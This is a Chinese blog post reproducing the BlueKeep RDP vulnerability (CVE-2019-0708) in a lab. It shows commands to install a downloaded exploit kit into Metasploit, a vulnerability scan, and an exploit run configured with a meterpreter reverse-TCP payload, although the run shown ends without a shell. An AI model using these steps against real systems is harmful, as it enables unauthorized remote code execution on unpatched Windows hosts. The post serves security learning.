cat-nineteen
0%

远程桌面远程执行漏洞(CVE-2019-0708)

发表于 更新于 分类于

漏洞描述

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。

参考:https://www.hackliu.com/?p=468

影响版本

Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp

FOFA语句

1

环境搭建

攻击机:kali 2021.1

受害机:Windows 7

漏洞复现

载入载荷

更新msf;

1
2
apt-get update
apt-get install metasploit-framework

下载攻击套件;

1
https://gitee.com/cat-nineteen/tools/blob/master/tools/msftools/CVE-2019-0708RDP.zip

替换msf中相应的文件;

1
2
3
4
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

image-20211105140429155

启动msf;

1
2
3
4
5
6
msfconsole

# 启动时报错信息如下:
root@kali:/opt/tools/msftools/CVE-2019-0708RDP# msfconsole 
Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps the lockfile is corrupted?
Run `bundle install` to install missing gems.

使用reload_all加载payload文件;

1
reload_all

搜索2019_0708,可以看到文件成功加载;

1
search 2019_0708

image-20211105140914488

漏洞验证

使用扫描模块(scanner);

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 > use  auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhost 192.168.220.130
rhost => 192.168.220.130
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options 

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.220.130  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3389             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)


Auxiliary action:

   Name  Description
   ----  -----------
   Scan  Scan for exploitable targets


msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[*] 192.168.220.130:3389  - Detected RDP on 192.168.220.130:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.220.130:3389  - The target is vulnerable.
[*] 192.168.220.130:3389  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# The target is vulnerable,证明目标主机存在0708漏洞

image-20211105141241472

漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhost 192.168.220.130
rhost => 192.168.220.130
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
rport => 3389
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 4
target => 4
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options 

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.220.130  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT            3389             yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.220.139  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)


msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
   8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)


msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.220.139:4444 
[*] 192.168.220.130:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.220.130:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.220.130:3389  - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.220.130:3389  - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.220.130:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.220.130:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[!] 192.168.220.130:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.220.130:3389 - Surfing channels ...
[*] 192.168.220.130:3389 - Lobbing eggs ...
[*] 192.168.220.130:3389 - Forcing the USE of FREE'd object ...

还是没成功获取shell。

欢迎关注我的其它发布渠道